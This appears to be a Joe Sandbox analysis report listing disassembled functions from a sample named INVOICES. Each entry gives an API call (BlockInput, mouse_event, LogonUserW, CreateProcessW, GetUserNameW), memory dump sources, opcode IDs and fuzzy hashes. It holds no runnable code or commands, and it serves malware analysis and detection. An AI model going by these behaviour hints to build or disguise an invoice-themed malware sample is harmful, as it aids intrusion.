                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BlockInput
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3456056419-0
                                                                                                                                  • Opcode ID: 3ce3586437f0d5323e2e2bdbf36f3f201466ad2be65543c59b180ed41be3abb6
                                                                                                                                  • Instruction ID: a2ee6db1924c84231cef09147e3635f8004b78f7f98f4583d17377002428bf03
                                                                                                                                  • Opcode Fuzzy Hash: 3ce3586437f0d5323e2e2bdbf36f3f201466ad2be65543c59b180ed41be3abb6
                                                                                                                                  • Instruction Fuzzy Hash: 35E012352001149FD7149F59D804A97BBD8AFA5760F00C156FD49D7251DAB5A8409B90
                                                                                                                                  Function 007BC928 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 007BC968
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3239928679-0
                                                                                                                                  • Opcode ID: ead05bfda15bf3c0aba559e8443779e9343b10037ecd0c8c4a55e29bbc602f43
                                                                                                                                  • Instruction ID: c0e1e744053f41601d9ad53be9d153a63f577352de9b3c0f867367828e635e47
                                                                                                                                  • Opcode Fuzzy Hash: ead05bfda15bf3c0aba559e8443779e9343b10037ecd0c8c4a55e29bbc602f43
                                                                                                                                  • Instruction Fuzzy Hash: D4F03931200259ABDB21AE58DC09FD63B95AB09720F048018BB15272E2CA787920D7A4
                                                                                                                                  Function 00794CFA Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00794D1D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: mouse_event
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2434400541-0
                                                                                                                                  • Opcode ID: b70b0588f27786b38b881586fefa0a8d6ef9118be5b73c8dadf9e1aa59205ced
                                                                                                                                  • Instruction ID: ff06212a047ea067a66685b7597bf6cb2bbf76ce41587739f4a86f443e7d0c12
                                                                                                                                  • Opcode Fuzzy Hash: b70b0588f27786b38b881586fefa0a8d6ef9118be5b73c8dadf9e1aa59205ced
                                                                                                                                  • Instruction Fuzzy Hash: ECD09EB836460579FC2C8B30BC1FF761229F709796FA446497702961C5A8EC6843A435
                                                                                                                                  Function 00788A73 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,007886B1), ref: 00788A93
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LogonUser
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1244722697-0
                                                                                                                                  • Opcode ID: 272fcdbcb9f44b570fbaf3e6310251950ce9b5895d34a0aba746a4db042fb093
                                                                                                                                  • Instruction ID: b96c463106a268822caf3d28d23ad4e6c9a69a122c92d166ee039201768ef986
                                                                                                                                  • Opcode Fuzzy Hash: 272fcdbcb9f44b570fbaf3e6310251950ce9b5895d34a0aba746a4db042fb093
                                                                                                                                  • Instruction Fuzzy Hash: C1D05E3226050EABEF019EA4DC02EAE3B69EB04B01F408111FE15C50A1C775D835AB60
                                                                                                                                  Function 007BC973 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0076BB3C,?,?,?,?,?,?), ref: 007BC99E
                                                                                                                                    • Part of subcall function 007BB669: _memset.LIBCMT ref: 007BB678
                                                                                                                                    • Part of subcall function 007BB669: _memset.LIBCMT ref: 007BB687
                                                                                                                                    • Part of subcall function 007BB669: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007F6F20,007F6F64), ref: 007BB6B6
                                                                                                                                    • Part of subcall function 007BB669: CloseHandle.KERNEL32 ref: 007BB6C8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2364484715-0
                                                                                                                                  • Opcode ID: 885cc5f93bd499514d3b9e8d6365cdbad3a4bc92aef2f8ed1f0e8d36c422b474
                                                                                                                                  • Instruction ID: 23e3f3fbde2d8d9edf941f6c90cc9885f56a6605701bbe85cab4b99274250570
                                                                                                                                  • Opcode Fuzzy Hash: 885cc5f93bd499514d3b9e8d6365cdbad3a4bc92aef2f8ed1f0e8d36c422b474
                                                                                                                                  • Instruction Fuzzy Hash: 84E01231200208DFCB02AF04EC44E993BA5FB08314F008060FA05472B2C775AD20EF14
                                                                                                                                  Function 0073167D Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00731AEE,?,?,?), ref: 007316AB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogLongNtdllProc_Window
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2065330234-0
                                                                                                                                  • Opcode ID: 49fcca9768ac7462471f24d0246e32d7d26edea979e222b5bcd13826e4e32187
                                                                                                                                  • Instruction ID: 372519754da82893e1f0fcba337e4de7ad39afb7e7f02dd73844f933a7eb65ec
                                                                                                                                  • Opcode Fuzzy Hash: 49fcca9768ac7462471f24d0246e32d7d26edea979e222b5bcd13826e4e32187
                                                                                                                                  • Instruction Fuzzy Hash: B8E0EC35200208FBDF15AF90DC15E643F26FF58750F508428FA450A2A2CA3AB522DB54
                                                                                                                                  Function 007BC8F9 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL ref: 007BC91E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3239928679-0
                                                                                                                                  • Opcode ID: 292e77ba6c7e84c0fe0942923c38e1f00dcaa1b700cfbd931d9f28da2e786e52
                                                                                                                                  • Instruction ID: 9a19fd6eb076e202ffe452e39ece877307fda3af1a8becb0fbd1eac61dbc0e4b
                                                                                                                                  • Opcode Fuzzy Hash: 292e77ba6c7e84c0fe0942923c38e1f00dcaa1b700cfbd931d9f28da2e786e52
                                                                                                                                  • Instruction Fuzzy Hash: 99E0E235200208EFCB01DF88D848E963BA5AB1D700F008054FA0547262C771A830EBA1
                                                                                                                                  Function 007BC8CA Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL ref: 007BC8EF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DialogNtdllProc_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3239928679-0
                                                                                                                                  • Opcode ID: 027a9e9b773c248a04c4603336014fee5efc094dca2f30cd8d5b8bf8c96ed0dd
                                                                                                                                  • Instruction ID: e382fe9e1a0820fcc5e8d4d846f82d8c3b9389d7c8597a527cd900e5142fff9d
                                                                                                                                  • Opcode Fuzzy Hash: 027a9e9b773c248a04c4603336014fee5efc094dca2f30cd8d5b8bf8c96ed0dd
                                                                                                                                  • Instruction Fuzzy Hash: B0E0E235200208EFCB01DF88DC88E963BA5AB1D700F008054FA0547262C771A830EB61
                                                                                                                                  Function 007316B5 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00732612: GetWindowLongW.USER32(?,000000EB), ref: 00732623
                                                                                                                                    • Part of subcall function 0073201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007320D3
                                                                                                                                    • Part of subcall function 0073201B: KillTimer.USER32(-00000001,?,?,?,?,007316CB,00000000,?,?,00731AE2,?,?), ref: 0073216E
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00731AE2,?,?), ref: 007316D4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2797419724-0
                                                                                                                                  • Opcode ID: 5f6a6e690be7f8da6c5745d4d0ddb0077cf25ddb8cddd8fbe34eadef5afc4d8d
                                                                                                                                  • Instruction ID: 0412bb9bc6912c9930e0f836889dd624f91974f7bfdd74bdbc2627cd922d806d
                                                                                                                                  • Opcode Fuzzy Hash: 5f6a6e690be7f8da6c5745d4d0ddb0077cf25ddb8cddd8fbe34eadef5afc4d8d
                                                                                                                                  • Instruction Fuzzy Hash: DFD01230240308F7EA203B50DC1FF593E199F14B50F40C020FB05291D3CA797821A568
                                                                                                                                  Function 0077215F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 00772171
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: NameUser
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2645101109-0
                                                                                                                                  • Opcode ID: d5e4493ce346c29905801837c7987acdb6e691d62d5da2d570cff0d6ee2c651f
                                                                                                                                  • Instruction ID: 07d24805ced3033947b2f656d1d2805a8eb520c567fa0fe78e5a698998191f59
                                                                                                                                  • Opcode Fuzzy Hash: d5e4493ce346c29905801837c7987acdb6e691d62d5da2d570cff0d6ee2c651f
                                                                                                                                  • Instruction Fuzzy Hash: A9C048F1801109DBCB05EBA0DA88EFEB7BCAB08304F2081A6E146F2110D7789B448B71
                                                                                                                                  Function 0075A2A4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0075A2AA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                  • Opcode ID: fc83450ad8e4b9ad6e8f8c2c539a091694dcd79032cfed2ec480597bf7ff47e0
                                                                                                                                  • Instruction ID: 77eb02f5768379fd3b641c61d9c8ac366e738e6eb60ff829c90bbfe50c446bc3
                                                                                                                                  • Opcode Fuzzy Hash: fc83450ad8e4b9ad6e8f8c2c539a091694dcd79032cfed2ec480597bf7ff47e0
                                                                                                                                  • Instruction Fuzzy Hash: 5FA0113000020CAB8A002B82EC08888BFACEA00AA0B00C020F80E820228B32A8208A88
                                                                                                                                  Function 00748968 Relevance: .6, Instructions: 590COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 53cbafc915b9f240f36c9fea6bc6233e297fa7f531503f7195e8ef89b887dbaf
                                                                                                                                  • Instruction ID: 33b295300358316c364bb24f63c400ffaf00e5289ee083d22819069090b78a5a
                                                                                                                                  • Opcode Fuzzy Hash: 53cbafc915b9f240f36c9fea6bc6233e297fa7f531503f7195e8ef89b887dbaf
                                                                                                                                  • Instruction Fuzzy Hash: 1D2224B0A0055ECFDF789E28C8D467CB7A1FB01344F68816AD956DB5A1EB3C9D81CB42
                                                                                                                                  Function 00752345 Relevance: .3, Instructions: 345COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                  • Instruction ID: ced935ac9f4fa4b5148f1c313dde4602478fdf32b259476c989f4b9fb3797893
                                                                                                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                  • Instruction Fuzzy Hash: 10C173322060930ADB2D463994341BEBFA15AA37B335A075DECB3DB0D5EF58D52DD620
                                                                                                                                  Function 0075277A Relevance: .3, Instructions: 341COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                  • Instruction ID: a1c508289525e0853cce63eafcd70f0f4e085d09d01c1be15fa6f6cf923e89af
                                                                                                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                  • Instruction Fuzzy Hash: A0C1943220619309DB2D463984341BEBFA15AA37B335A076DECB3DB1C5EF58D52DD620
                                                                                                                                  Function 009435F0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1421076075.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_940000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
